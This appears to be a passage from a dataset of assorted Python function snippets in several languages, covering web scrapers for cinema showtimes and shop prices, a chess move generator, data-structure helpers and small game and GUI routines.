subtitulada\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tpelicula = peli_query.get(subtitulada= (idioma == 'ingles'), doblada = (idioma != 'ingles') )\n\t\t\t\t\t\t\t\n\t\t\t\t\t\texcept Exception, e:\n\t\t\t\t\t\t\tlogger.debug( e)\n\t\t\t\t\t\t\tlogger.debug( \"Error de idioma con la pelicula %s, idioma: %s\" % (titulo, idioma))\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\telif len(peli_query) == 1:\n\t\t\t\t\t\tpelicula = peli_query[0]\n\t\t\t\t\telse:\n\t\t\t\t\t\tlogger.debug( u'No encontre pelicula %s, tres_D=%s, idioma=%s' %(titulo, tres_D, idioma))\n\t\t\t\t\t\tcontinue\n\t\t\t\t\t#logger.debug( u'pelicula %s' %pelicula)\n\t\t\t\t\thoras_html = peli.findAll('div', id='fecha')\n\t\t\t\t\t\n\t\t\t\t\t#logger.debug( u'tengo %s fechas aqui...' %len(horas_html))\n\t\t\t\t\t#logger.debug( horas_html)\n\t\t\t\t\t\n\t\t\t\t\tfor tag in horas_html:\n\t\t\t\t\t\t#Me salto todo lo que no es html\n\t\t\t\t\t\tif type(tag) != NavigableString:\n\t\t\t\t\t\t\t#Si esta disponible, obtiene num. 
sala\n\t\t\t\t\t\t\tif tag.get('style', '').find('text-transform: uppercase;') > -1: sala = sala_exp.search(tag.string).group(1)\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t#logger.debug( u'hay %s horarios aqui'%len(tag.findNext('div', id='horarios').findAll('a', 'texto_1')))\n\t\t\t\t\t\t\tfecha = parseDate(tag.string)\n\t\t\t\t\t\t\t#logger.debug( pelicula)\n\t\t\t\t\t\t\t#logger.debug( complejo)\n\t\t\t\t\t\t\tfunciones.extend([{\n \t\t\t\t\t\t\t\t\t'peli_ver': pelicula,\n \t\t\t\t\t\t\t\t\t'complejo': complejo,\n \t\t\t\t\t\t\t\t\t'hora': datetime.datetime(fecha.year, fecha.month, fecha.day, *time.strptime( hora_html.string , '%H:%M')[3:5]),\n \t\t\t\t\t\t\t\t\t'pol_idShowTime': show_exp.search(hora_html['href']).group(1),\n \t\t\t\t\t\t\t\t\t'sala': sala,\n \t\t\t\t\t\t\t\t\t} for hora_html in tag.findNext('div', id='horarios').findAll('a', 'texto_1')])\n\t\t#logger.debug( len(funciones))\n\t\treturn funciones", "def getAbono(self, cod):\n return self.conexion.ejecutarSQL(\"\"\"select id, fecha, hora, valor, id_venta, usuario_colaborador, id_tipoPago\n from abonos\n where id = %s\"\"\"%(cod))", "def ottieni_ultimi(astaid, Oggetto, numero=0):\n queryS = Oggetto.objects.filter(asta__id=astaid).order_by('-id')\n if(int(numero)==0):\n ultimi = queryS.all()\n else:\n ultimi = queryS[:numero]\n return ultimi", "def __init__(self):\n self.nombre_roues = 4\n self.nombre_fauteils = 1\n self.moteur = False\n self.volant = True", "def get_mvts(self, plateau):\n if self.type == \"p\": #Pion\n if self.color == \"w\":\n diags = [[self.x-1, self.y+1],[self.x+1, self.y+1]] #Mouvements possibles de diagonales\n faces = [[self.x, self.y+1]] #Mouvements possibles de face\n if not self.moved: #Si le pion n'a pas encore bougé de la partie\n faces.append([self.x, self.y+2])\n else:\n diags = [[self.x-1, self.y-1], [self.x+1, self.y-1]]\n faces = [[self.x, self.y-1]] #Mouvements possibles de \n if not self.moved:\n faces.append([self.x, self.y-2])\n pos = [] #Position de déplacement validées\n for d in diags:\n if verif_case(d[0], d[1]): #Si la case est sur le plateau \n pion = plateau.get_pion(d[0],d[1])\n if pion != None and pion.color != self.color: #Si il y a un pion ennemi\n pos.append(d)\n for f in faces: \n if verif_case(f[0],f[1]):\n pion = plateau.get_pion(f[0], f[1])\n if pion == None: #Si il n'y a pas de pion\n pos.append(f)\n return pos\n elif self.type == \"t\": #Tour\n pos = []\n dir = [[1,0],[-1,0],[0,1],[0,-1]] #4 directions possibles\n for d in dir:\n x,y = self.x+d[0],self.y+d[1] #Projection de position\n while verif_case(x,y): #Tant que (x, y) est sur le plateau\n pion = plateau.get_pion(x, y)\n if pion != None: #Si il y a un pion\n if pion.color != self.color: #Si il n'est pas allié\n pos.append([x,y])\n break\n pos.append([x,y])\n x += d[0]\n y += d[1]\n return pos\n elif self.type == \"c\": #Cavalier\n l = [-2,-1,1,2]\n mvts = [[x,y] for x in l for y in l if abs(x)!=abs(y)]\n pos = []\n for m in mvts:\n x = self.x + m[0]\n y = self.y + m[1]\n if verif_case(x,y):\n pion = plateau.get_pion(x, y)\n if pion == None or pion.color != self.color:\n pos.append([x, y])\n return pos\n elif self.type == \"f\": #Fou\n dir = [[1,1],[-1,1],[-1,-1],[1,-1]]\n pos = []\n for d in dir:\n x,y = self.x+d[0],self.y+d[1]\n while verif_case(x,y):\n pion = plateau.get_pion(x, y)\n if pion != None:\n if pion.color != self.color:\n pos.append([x,y])\n break\n pos.append([x,y])\n x += d[0]\n y += d[1]\n return pos\n elif self.type == \"k\": #Roi\n mvts = [[1,0],[-1,1],[0,-1],[-1,-1],[-1,0],[-1,1],[0,1],[1,1]] #4 mouvements 
possibles\n pos = []\n for m in mvts:\n x = self.x + m[0]\n y = self.y + m[1]\n if verif_case(x, y):\n pion = plateau.get_pion(x, y)\n if pion == None or pion.color != self.color:\n pos.append([self.x + m[0], self.y + m[1]])\n return pos\n elif self.type == \"q\": #Dame\n pos = []\n dir = [[1,0],[1,-1],[0,-1],[-1,-1],[-1,0],[-1,1],[0,1],[1,1]]\n for d in dir:\n x,y = self.x+d[0],self.y+d[1]\n while verif_case(x,y):\n pion = plateau.get_pion(x, y)\n if pion != None:\n if pion.color != joueur:\n pos.append([x,y])\n break\n pos.append([x,y])\n x += d[0]\n y += d[1]\n return pos", "def first(self):", "def obtenerPelicula(nombre=None):\n pelicula = Pelicula(None, nombre)\n\n return pelicula", "def eksport(lista):\n # wynik - lista zawierajaca wynik koncowy dzialania funkcji(lata i wartosci dla poszczegolnych panstw)\n wynik = []\n for panstwo in lista:\n # rok - lista zawierajaca lata\n # wartosc - lista zawierajaca wartosci dla lat\n rok = []\n wartosc = []\n for element in panstwo:\n # sprawdzenie czy klucz posiada odpowiednia wartosc\n if element[1].get('key') == \"NE.EXP.GNFS.CD\":\n # dodanie roku do listy\n rok.append(int(element[2].text))\n # rozpatrywanie przypadku w ktorym wartosc jest None\n if element[3].text is None:\n wartosc.append(element[3].text)\n else:\n wartosc.append(float(element[3].text))\n # dodawanie list dla poszczegolnych panstw do listy wynikowej\n wynik.append(rok)\n wynik.append(wartosc)\n\n return wynik", "def Cel(categorie, pagini, cautare=\"normala\"):\n log = Logger()\n debug = Verificare_Debug()\n if cautare == \"normala\":\n categorie = html_part_link[categorie]\n s = Scrapper(jsonfn, categorie, None)\n elif cautare == \"personalizata\":\n s = Scrapper(jsonfn, categorie, None, cautare=\"personalizata\")\n html = s.get_html_code(s.link)\n log.scriere(\"Preiau date de pe {}.\".format(s.link))\n\n # Preiau numarul maxim de pagini\n pagini_max = 0\n for el in html.select(s.jsondata[\"pagini\"][\"tag\"]):\n try:\n if el[s.jsondata[\"pagini\"][\"tip\"]] == s.jsondata[\"pagini\"][\"termen\"]:\n for e in el.select(s.jsondata[\"pagini\"][\"tag2\"]):\n try:\n if pagini_max < int(e.text):\n pagini_max = int(e.text)\n except:\n pass\n except:\n pass\n\n # Setez numarul de pagini de pe care se vor prelua produse, comparand datele introduse de utilizator cu numarul\n # maxim de pagini admis de cautare\n if pagini == None:\n pagini = 10\n if pagini > pagini_max:\n pagini = pagini_max\n\n # Pentru fiecare pagina in parte\n hrefs = []\n for i in range(1, pagini+1):\n if cautare == \"normala\":\n html = s.get_html_code(s.jsondata[\"link_pagina\"].format(categorie, i))\n elif cautare == \"personalizata\":\n html = s.get_html_code(s.jsondata[\"link_personalizat_pagina\"].format(categorie, i))\n # Preiau lista produselor\n container = \"\"\n for el in html.select(s.jsondata[\"box\"][\"tag\"]):\n try:\n if el[s.jsondata[\"box\"][\"tip\"]] == s.jsondata[\"box\"][\"termen\"]:\n container = el\n break\n except:\n pass\n\n # Preiau produsele\n prod = []\n for el in container.select(s.jsondata[\"produs\"][\"tag\"]):\n try:\n if el[s.jsondata[\"produs\"][\"tip\"]] == s.jsondata[\"produs\"][\"termen\"]:\n # Verific daca produsul este la reducere\n for e in el.select(s.jsondata[\"produs\"][\"promo\"][\"tag\"]):\n try:\n if e[s.jsondata[\"produs\"][\"promo\"][\"tip\"]] == s.jsondata[\"produs\"][\"promo\"][\"termen\"]:\n prod.append(el)\n break\n except:\n pass\n except:\n pass\n\n # Preiau link-ul spre produs\n for p in prod:\n for el in p.select(s.jsondata[\"href\"][\"tag\"]):\n try:\n if 
el[s.jsondata[\"href\"][\"tip\"]] == s.jsondata[\"href\"][\"termen\"]:\n hrefs.append(el[s.jsondata[\"href\"][\"arg\"]])\n break\n except:\n pass\n\n # Preiau informatiile fiecarui produs\n for href in hrefs:\n log.scriere(\"Preiau informatiile de pe {}.\".format(href))\n if debug == True:\n Debug(href, 0)\n info = {}\n html = s.get_html_code(href)\n\n # Preiau titlul produsului\n for el in html.select(s.jsondata[\"data\"][\"titlu\"][\"tag\"]):\n try:\n if el[s.jsondata[\"data\"][\"titlu\"][\"tip\"]] == s.jsondata[\"data\"][\"titlu\"][\"termen\"]:\n info[\"titlu\"] = el.text\n break\n except:\n pass\n\n # Preiau noul pret, vechiul pret si discount-ul produsului\n _ = {}\n for el in html.select(s.jsondata[\"data\"][\"pret\"][\"nou\"][\"tag\"]):\n try:\n if el[s.jsondata[\"data\"][\"pret\"][\"nou\"][\"tip\"]] == s.jsondata[\"data\"][\"pret\"][\"nou\"][\"termen\"]:\n _[\"nou\"] = el.text + \" Lei\"\n break\n except:\n pass\n for el in html.select(s.jsondata[\"data\"][\"pret\"][\"vechi\"][\"tag\"]):\n try:\n if el[s.jsondata[\"data\"][\"pret\"][\"vechi\"][\"tip\"]] == s.jsondata[\"data\"][\"pret\"][\"vechi\"][\"termen\"]:\n __ = el.text.split(\"|\")[-1].split(\" \")\n _[\"vechi\"] = __[-2] + \" \" + __[-1].capitalize()\n __ = el.text.split(\"|\")[0].split(\" \")\n _[\"discount\"] = __[-3] + \" \" + __[-2].capitalize()\n except:\n pass\n info[\"pret\"] = _\n\n # Preiau rating-ul produsului (Daca exista. Daca nu, se initializeaza cu 0 automat)\n _ = {}\n ok = 0\n for el in html.select(s.jsondata[\"data\"][\"rating\"][\"rata\"][\"tag\"]):\n try:\n if el[s.jsondata[\"data\"][\"rating\"][\"rata\"][\"tip\"]] == s.jsondata[\"data\"][\"rating\"][\"rata\"][\"termen\"]:\n _[\"rata\"] = el.text\n ok = 1\n break\n except:\n pass\n for el in html.select(s.jsondata[\"data\"][\"rating\"][\"review-uri\"][\"tag\"]):\n try:\n if el[s.jsondata[\"data\"][\"rating\"][\"review-uri\"][\"tip\"]] == s.jsondata[\"data\"][\"rating\"][\"review-uri\"][\"termen\"]:\n _[\"review-uri\"] = el.text\n break\n except:\n pass\n if ok == 1:\n info[\"rating\"] = _\n elif ok == 0:\n info[\"rating\"] = {\"rata\":\"0\", \"review-uri\":\"0\"}\n\n # Preiau descrierea produsului\n _ = \"\"\n for el in html.select(s.jsondata[\"data\"][\"descriere\"][\"tag\"]):\n try:\n if el[s.jsondata[\"data\"][\"descriere\"][\"tip\"]] == s.jsondata[\"data\"][\"descriere\"][\"termen\"]:\n _ = cel_string.formare_descriere(el.text)\n break\n except:\n pass\n if _ != \"\" and _ != []:\n info[\"descriere\"] = _\n else:\n info[\"descriere\"] = ['']\n\n # Preiau specificatiile produsului\n _ = {}\n for el in html.select(s.jsondata[\"data\"][\"specs\"][\"tag\"]):\n try:\n if el[s.jsondata[\"data\"][\"specs\"][\"tip\"]] == s.jsondata[\"data\"][\"specs\"][\"termen\"]:\n title = \"\"\n __ = {}\n for e in el.select(s.jsondata[\"data\"][\"specs\"][\"elem\"][\"tag\"]):\n try:\n if len(e[s.jsondata[\"data\"][\"specs\"][\"elem\"][\"tip\"]]) > 0:\n e2 = e.select(s.jsondata[\"data\"][\"specs\"][\"elem\"][\"spec\"][\"tag\"])\n __[e2[0].text] = e2[1].text\n except:\n if title == \"\":\n title = e.text\n if len(__.keys()) > 0:\n _[title] = __\n __ = {}\n title = e.text\n if title != '':\n _[title] = __\n else:\n _[\"Specs\"] = __\n except:\n pass\n info[\"specs\"] = cel_string.formare_specificatii(_)\n\n # Verific daca exista cadou si, daca da, preiau informatiile\n _ = {}\n gift = 0\n for el in html.select(s.jsondata[\"data\"][\"cadou\"][\"tag\"]):\n try:\n if el[s.jsondata[\"data\"][\"cadou\"][\"tip\"]] == s.jsondata[\"data\"][\"cadou\"][\"termen\"]:\n if debug == True:\n 
Debug(\"Gift gasit!\", 0)\n gift = 1\n t = ''\n for e in el.select(s.jsondata[\"data\"][\"cadou\"][\"titlu\"][\"tag\"]):\n try:\n if e[s.jsondata[\"data\"][\"cadou\"][\"titlu\"][\"tip\"]] == s.jsondata[\"data\"][\"cadou\"][\"titlu\"][\"termen\"]:\n t = e.text\n break\n except:\n pass\n if t != '' :\n _[\"titlu\"] = t\n for e in el.select(s.jsondata[\"data\"][\"cadou\"][\"pret\"][\"tag\"]):\n try:\n if e[s.jsondata[\"data\"][\"cadou\"][\"pret\"][\"tip\"]] == s.jsondata[\"data\"][\"cadou\"][\"pret\"][\"termen\"]:\n _[\"pret\"] = e.text\n break\n except:\n pass\n else:\n # Cadou fara pret, difera class-ul\n for e in el.select(s.jsondata[\"data\"][\"cadou\"][\"titlu_farapret\"][\"tag\"]):\n try:\n if e[s.jsondata[\"data\"][\"cadou\"][\"titlu_farapret\"][\"tip\"]] == s.jsondata[\"data\"][\"cadou\"][\"titlu_farapret\"][\"termen\"]:\n _[\"titlu\"] = e.text\n except:\n pass\n _[\"pret\"] = \"-\"\n __ = el.select(s.jsondata[\"data\"][\"cadou\"][\"link\"][\"tag\"])\n _[\"link\"] = __[0][s.jsondata[\"data\"][\"cadou\"][\"link\"][\"arg\"]]\n gift_html = s.get_html_code(_[\"link\"])\n for e in gift_html.select(s.jsondata[\"data\"][\"cadou\"][\"imagine\"][\"tag\"]):\n try:\n if e[s.jsondata[\"data\"][\"cadou\"][\"imagine\"][\"tip\"]] == s.jsondata[\"data\"][\"cadou\"][\"imagine\"][\"termen\"]:\n for e2 in e.select(s.jsondata[\"data\"][\"cadou\"][\"imagine\"][\"tag2\"]):\n try:\n _[\"imagine_link\"] = cel_string.link_cadou_imagine(e2[s.jsondata[\"data\"][\"cadou\"][\"imagine\"][\"arg\"]])\n break\n except:\n pass\n break\n except:\n pass\n break\n except:\n pass\n if gift == 1:\n info[\"cadou\"] = _\n\n # Salvez link-ul spre produs\n info[\"link\"] = href\n\n # Preiau imaginile produsului\n imgs = []\n c = \"\"\n for el in html.select(s.jsondata[\"data\"][\"imagini\"][\"tag\"]):\n try:\n if el[s.jsondata[\"data\"][\"imagini\"][\"tip\"]] == s.jsondata[\"data\"][\"imagini\"][\"termen\"]:\n c = el\n break\n except:\n pass\n sec_link = \"\"\n try:\n for el in c.select(s.jsondata[\"data\"][\"imagini\"][\"secundare\"][\"link\"][\"tag\"]):\n try:\n sec_link = el[s.jsondata[\"data\"][\"imagini\"][\"secundare\"][\"link\"][\"arg\"]]\n break\n except:\n pass\n except:\n pass\n if sec_link != href and sec_link != '':\n sec_html = s.get_html_code(sec_link)\n for el in sec_html.select(s.jsondata[\"data\"][\"imagini\"][\"secundare\"][\"tag\"]):\n try:\n if el[s.jsondata[\"data\"][\"imagini\"][\"secundare\"][\"tip\"]] == s.jsondata[\"data\"][\"imagini\"][\"secundare\"][\"termen\"]:\n for e in el.select(s.jsondata[\"data\"][\"imagini\"][\"secundare\"][\"img_tag\"]):\n try:\n imgs.append(e[s.jsondata[\"data\"][\"imagini\"][\"secundare\"][\"arg\"]])\n except:\n pass\n except:\n pass\n elif sec_link == href and sec_link != '':\n # Inseamna ca exista doar o poza, cea principala\n for el in html.select(s.jsondata[\"data\"][\"imagini\"][\"tag\"]):\n try:\n if el[s.jsondata[\"data\"][\"imagini\"][\"tip\"]] == s.jsondata[\"data\"][\"imagini\"][\"termen\"]:\n for e in el.select(s.jsondata[\"data\"][\"imagini\"][\"img_tag\"]):\n imgs.append(e[s.jsondata[\"data\"][\"imagini\"][\"arg\"]])\n break\n except:\n pass\n # Descarc imaginile\n try:\n _ = info[\"titlu\"].split(\" \")\n except:\n _ = \"\"\n imgname = \"\"\n try:\n for i in range(0, 10):\n imgname = imgname + _[i] + \" \"\n except:\n pass\n imgname = imgname + \"- \"\n IMGS = []\n log.scriere(\"Descarc {} imagini.\".format(len(imgs)))\n for i in range(0, len(imgs)):\n try:\n utils.download_imagine(imgs[i], imgname + str(i))\n if utils.verificare_prezenta_imagine(imgname + 
str(i)) == True:\n IMGS.append(imgname + str(i) + \".{}\".format(imgs[i].split(\"/\")[-1].split(\".\")[-1]))\n except:\n if debug == True:\n Debug(\"Eroare download {}\".format(str(imgs[i])), 2)\n info[\"imagini\"] = IMGS\n\n # Verific daca exista cadou si, daca da, downloadez imaginea cadoului\n if \"cadou\" in info.keys():\n try:\n utils.download_imagine(info[\"cadou\"][\"imagine_link\"], imgname + \"CADOU\")\n info[\"cadou\"][\"imagine\"] = imgname + \"CADOU\" + \".{}\".format(info[\"cadou\"][\"imagine_link\"].split(\"/\")[-1].split(\".\")[-1])\n except:\n pass\n\n # Verific daca exista toate datele si, daca da, creez fisierul HTML\n if debug == True:\n Debug(str(info.keys()), 0)\n Debug(str(info[\"pret\"].keys()), 0)\n Debug(str(info[\"rating\"].keys()), 0)\n try:\n Debug(str(info[\"cadou\"].keys()), 0)\n except:\n pass\n kw = {\"titlu\": None, \"pret\": [\"vechi\", \"nou\", \"discount\"], \"rating\": [\"rata\", \"review-uri\"], \"descriere\": None,\n \"specs\": None, \"imagini\": None, \"link\": None}\n kw_gift = {\"titlu\": None, \"pret\": [\"vechi\", \"nou\", \"discount\"], \"rating\": [\"rata\", \"review-uri\"],\n \"descriere\": None, \"specs\": None, \"imagini\": None, \"link\": None,\n \"cadou\": [\"titlu\", \"pret\", \"link\", \"imagine\", \"imagine_link\"]}\n if \"cadou\" in info.keys():\n if utils.verificare_date(info, kw_gift) == False:\n # Daca nu sunt toate datele necesare, sterg pozele descarcate\n if debug == True:\n Debug(\"Date insuficente!\", 2)\n utils.stergere_set_imagini(imgname)\n else:\n log.scriere(\"Salvez fisierul HTML.\")\n creatorHTML_gift(info)\n d = db.Database(\"cel\")\n d.initializare_conexiune()\n x = d.cautare_date_link(info[\"link\"])\n if len(x) == 0:\n _ = d.cautare_ultima_data(info[\"link\"])\n if _ == 0:\n d.adaugare_date_2({\"link\": info[\"link\"], \"pret\": cel_string.transformare_pret_int(info[\"pret\"][\"nou\"])})\n else:\n if db.comparare_data_actuala_cu_ultima(_) == 1:\n d.adaugare_date_2({\"link\": info[\"link\"], \"pret\": cel_string.transformare_pret_int(info[\"pret\"][\"nou\"])})\n d.inchidere_conexiune()\n else:\n regasit = db.alegere_pretul_minim(x)\n if regasit[\"pret\"] < cel_string.transformare_pret_int(info[\"pret\"][\"nou\"]):\n if debug == True:\n Debug(\"Produsul a fost regasit!\", 0)\n HTML_adaugare_regasire(info[\"titlu\"], regasit[\"data\"], regasit[\"pret\"])\n _ = d.cautare_ultima_data(info[\"link\"])\n if _ == 0:\n d.adaugare_date_2({\"link\": info[\"link\"], \"pret\": cel_string.transformare_pret_int(info[\"pret\"][\"nou\"])})\n else:\n if db.comparare_data_actuala_cu_ultima(_) == 1:\n d.adaugare_date_2({\"link\": info[\"link\"], \"pret\": cel_string.transformare_pret_int(info[\"pret\"][\"nou\"])})\n d.inchidere_conexiune()\n\n\n else:\n if utils.verificare_date(info, kw) == False:\n # Daca nu sunt toate datele necesare, sterg pozele descarcate\n if debug == True:\n Debug(\"Date insuficiente\", 2)\n utils.stergere_set_imagini(imgname)\n else:\n log.scriere(\"Salvez fisierul HTML.\")\n creatorHTML(info)\n d = db.Database(\"cel\")\n d.initializare_conexiune()\n x = d.cautare_date_link(info[\"link\"])\n if len(x) == 0:\n _ = d.cautare_ultima_data(info[\"link\"])\n if _ == 0:\n d.adaugare_date_2({\"link\": info[\"link\"], \"pret\": cel_string.transformare_pret_int(info[\"pret\"][\"nou\"])})\n else:\n if db.comparare_data_actuala_cu_ultima(_) == 1:\n d.adaugare_date_2({\"link\": info[\"link\"], \"pret\": cel_string.transformare_pret_int(info[\"pret\"][\"nou\"])})\n d.inchidere_conexiune()\n else:\n regasit = 
db.alegere_pretul_minim(x)\n if regasit[\"pret\"] < cel_string.transformare_pret_int(info[\"pret\"][\"nou\"]):\n if debug == True:\n Debug(\"Produsul a fost regasit!\", 0)\n HTML_adaugare_regasire(info[\"titlu\"], regasit[\"data\"], regasit[\"pret\"])\n _ = d.cautare_ultima_data(info[\"link\"])\n if _ == 0:\n d.adaugare_date_2({\"link\": info[\"link\"], \"pret\": cel_string.transformare_pret_int(info[\"pret\"][\"nou\"])})\n else:\n if db.comparare_data_actuala_cu_ultima(_) == 1:\n d.adaugare_date_2({\"link\": info[\"link\"], \"pret\": cel_string.transformare_pret_int(info[\"pret\"][\"nou\"])})\n d.inchidere_conexiune()", "def __iter__(self):\n ids_productos = self.carro.keys()\n #obtiene los objetos producto y los agrega al carro\n productos = Producto.objects.filter(id__in=ids_productos)\n for producto in productos:\n self.carro[str(producto.id)]['producto'] = producto\n\n for item in self.carro.values():\n item['precio']=Decimal(item['precio'])\n item['precio_total'] = item['precio']*item['cantidad']\n yield item", "def busca(self, k):\n x = self.getRaiz()\n while x is not None and k != x.getChave():\n if k < x.getChave():\n x = x.getEsquerdo()\n else:\n x = x.getDireito()\n return x", "def representarArbolAutomatico(self):\n if not self.stepByStep:\n print(\"Pintar paredes en auto\")\n # Reinicio la matrix\n self.reiniciarMatrix()\n if self.arbol.raiz != None:\n # Capturo todos los valores\n for i in self.arbol.returnArbolComoVector():\n \n # Esta variable captura si se debe de pintar en x o y\n xy = int(i[1])\n cordenadas = i[0]\n print(\"===========NODOS DEL ARBOL=============\")\n print(i)\n print(\"===========NODOS DEL ARBOL=============\")\n # Se pinta en x o y?\n if xy == 0:\n self.crearParedX(int(cordenadas[0]), int(cordenadas[1]))\n else:\n self.crearParedY(int(cordenadas[0]), int(cordenadas[1]))\n\n self.esperarUnRato()\n\n print(\"========LISTO PARA PINTAR EL SIGUIENTE================\")\n \n else:\n print(\"Arbol vacio\")", "def Item(self) -> object:", "def Item(self) -> object:", "def algoritmo(posicionInicial):\n\tglobal vertices, lados\n\n\t# Inicio el algoritmo QuickHull y almacenare el resultado en vertices\n\tconvex = quickHull.QuickHull(posicionInicial)\n\tvertices = convex.quickHull(verticesObjeto)\n\tprint(\"\\nVertices en la envolvente convexa:\\n\")\n\tfor vertex in (vertices):\n\t\tprint(vertex)\n\n\t# creo la lista de lados a partir del los vertices de la envolvente\n\tlados = creaLados(vertices)\n\n\t# creo la maya y el objeto\n\tmi_mesh = bpy.data.meshes.new(nombre)\n\tmi_objeto = bpy.data.objects.new(nombre, mi_mesh)\n\n\t# coloco el objeto en la misma posicion en la que estaba el objeto\n\t# anteriormente seleccionado.\n\tmi_objeto.location = posicionInicial\n\n\t# enlazo el objeto a la escena\n\tbpy.context.scene.objects.link(mi_objeto)\n\n\t# creo el la maya del objeto\n\tmi_mesh.from_pydata(vertices,lados,caras)\n\tmi_mesh.update(calc_edges=True)", "def atender(self):\n\n if self.enfila>0: #Para que atiendan solamente si e que hay alguien en la fila\n\n self.enfila-=1\n self.fila.pop(0) #Saco primer elemento de la fila (Atienden al primer cliente)", "def creaLE(venta): #Esta sección fue hecha por Ángel\n listaPGA = [] # Esto genera la lista necesaria para pasarlo al archivo\n for elemento in venta:\n listaN = elemento[0] + \",\"\n listaN += str(elemento[1]) + \"\\n\"\n listaPGA.append(listaN)\n return listaPGA", "def apilar(pila, dato):\n pila.cima += 1\n pila.datos[pila.cima] = dato", "def ponto_medio(self, alvo):\r\n mx = (self.x + alvo.x)/2\r\n my = 
(self.y + alvo.y)/2\r\n return Ponto1(mx, my)", "def cellules(self): # itérateur rendu safe\n cellule_courante = self.tete\n while cellule_courante is not None:\n cellule_suivante = cellule_courante.suivant # sauvegarde\n yield cellule_courante\n cellule_courante = cellule_suivante # récupération de la sauvegarde", "def __getitem__(self, item):\n return self.elements[item]", "def pintarIMAGENENMAPA(self, pos):\n # Agrego al vector que controla las images\n k = (pos[0], pos[1], \"img\"+str(self.idIMG))\n # Si deseo pintar una silla\n if self.queIMGAgregar == 1:\n self.telaMAPA.create_image(k[0], k[1], image=self.imgSilla, tag=k[2])\n # Como fue agregado un elemento en el mapa procedo a registrarlo\n self.cotroladoraIMGREG.append(k)\n # Como una img fue agregada procedo a aumentar el id\n self.idIMG = self.idIMG + 1\n\n # Si deseo pintar una mesa\n if self.queIMGAgregar == 2:\n self.telaMAPA.create_image(k[0], k[1], image=self.imgMesa, tag=k[2])\n # Como fue agregado un elemento en el mapa procedo a registrarlo\n self.cotroladoraIMGREG.append(k)\n # Como una img fue agregada procedo a aumentar el id\n self.idIMG = self.idIMG + 1\n\n # Se deseo pintar una nevera\n if self.queIMGAgregar == 3:\n self.telaMAPA.create_image(k[0], k[1], image=self.imgNevera, tag=k[2])\n # Como fue agregado un elemento en el mapa procedo a registrarlo\n self.cotroladoraIMGREG.append(k)\n # Como una img fue agregada procedo a aumentar el id\n self.idIMG = self.idIMG + 1\n\n # Si deseo pintar una cama\n if self.queIMGAgregar == 4:\n self.telaMAPA.create_image(k[0], k[1], image=self.imgCama, tag=k[2])\n # Como fue agregado un elemento en el mapa procedo a registrarlo\n self.cotroladoraIMGREG.append(k)\n # Como una img fue agregada procedo a aumentar el id\n self.idIMG = self.idIMG + 1\n\n # Si deseo pintar un sofa\n if self.queIMGAgregar == 5:\n self.telaMAPA.create_image(k[0], k[1], image=self.imgSofa, tag=k[2])\n # Como fue agregado un elemento en el mapa procedo a registrarlo\n self.cotroladoraIMGREG.append(k)\n # Como una img fue agregada procedo a aumentar el id\n self.idIMG = self.idIMG + 1\n\n # Si deseo pintar tv\n if self.queIMGAgregar == 6:\n self.telaMAPA.create_image(k[0], k[1], image=self.imgTV, tag=k[2])\n # Como fue agregado un elemento en el mapa procedo a registrarlo\n self.cotroladoraIMGREG.append(k)\n # Como una img fue agregada procedo a aumentar el id\n self.idIMG = self.idIMG + 1\n\n # Si deseo pintar lampara\n if self.queIMGAgregar == 7:\n self.telaMAPA.create_image(k[0], k[1], image=self.imgLampara, tag=k[2])\n # Como fue agregado un elemento en el mapa procedo a registrarlo\n self.cotroladoraIMGREG.append(k)\n # Como una img fue agregada procedo a aumentar el id\n self.idIMG = self.idIMG + 1\n\n # Si deseo pintar planta\n if self.queIMGAgregar == 8:\n self.telaMAPA.create_image(k[0], k[1], image=self.imgPlanta, tag=k[2])\n # Como fue agregado un elemento en el mapa procedo a registrarlo\n self.cotroladoraIMGREG.append(k)\n # Como una img fue agregada procedo a aumentar el id\n self.idIMG = self.idIMG + 1\n\n # Si deseo pintar sanitario\n if self.queIMGAgregar == 9:\n self.telaMAPA.create_image(k[0], k[1], image=self.imgSanitario, tag=k[2])\n # Como fue agregado un elemento en el mapa procedo a registrarlo\n self.cotroladoraIMGREG.append(k)\n # Como una img fue agregada procedo a aumentar el id\n self.idIMG = self.idIMG + 1\n\n # Si deseo pintar lavamanos\n if self.queIMGAgregar == 10:\n self.telaMAPA.create_image(k[0], k[1], image=self.imgLavamanos, tag=k[2])\n # Como fue agregado un elemento 
en el mapa procedo a registrarlo\n self.cotroladoraIMGREG.append(k)\n # Como una img fue agregada procedo a aumentar el id\n self.idIMG = self.idIMG + 1\n\n # Si deseo pintar la ducha\n if self.queIMGAgregar == 11:\n self.telaMAPA.create_image(k[0], k[1], image=self.imgDucha, tag=k[2])\n # Como fue agregado un elemento en el mapa procedo a registrarlo\n self.cotroladoraIMGREG.append(k)\n # Como una img fue agregada procedo a aumentar el id\n self.idIMG = self.idIMG + 1", "def get_janaka(self, chakra_list):\n if self.janaka_melam is None:\n self.janaka = None\n else:\n for c in chakra_list:\n if c.melam == self.janaka_melam:\n self.janaka = c.raga\n break", "def getDialogo(self):\n ##print self.html_version_taquigrafica\n # bsp = BeautifulSoup(self.html_version_taquigrafica)\n bsp = self.html_version_taquigrafica\n\n expresiones = bsp.find_all('span')\n\n texto = ''\n for elemento in expresiones:\n texto += elemento.getText()\n\n self.dialogo = texto", "def cargar_otras(self):\n\n stream_cargar = open ('yo_otros.txt', 'rt',encoding=\"utf-8\")\n datos=stream_cargar.readlines()\n \n # print(datos)\n # print (len(kasino.maquinas))\n\n lista_maquinas=[]\n lista_deco =[]\n day=\"\"\n money=\"\"\n\n contador=0\n dia_o_dinero=\"dia\"\n\n for i in datos[0]:\n # print(contador,i)\n if contador <8:\n lista_maquinas.append(i)\n contador+=1\n\n elif contador <17:\n lista_deco.append(i)\n contador+=1\n\n\n elif contador >= 17 and dia_o_dinero ==\"dia\":\n if i ==\"D\":\n pass\n elif i ==\"M\":\n dia_o_dinero=\"dinero\"\n else:\n day+=i\n elif contador >= 17 and dia_o_dinero == \"dinero\":\n money+=i\n \n \n\n # print(\"lm\",lista_maquinas)\n # print (\"ld\",lista_deco)\n # print(day,money)\n\n contador=0\n for i in kasino.maquinas:\n kasino.maquinas[i]=int(lista_maquinas[contador])\n contador+=1\n\n contador=0\n for i in kasino.decoracion:\n kasino.decoracion[i]=int(lista_deco[contador])\n contador+=1\n\n kasino.dia=int( day)\n kasino.dinero=int(money)" ]
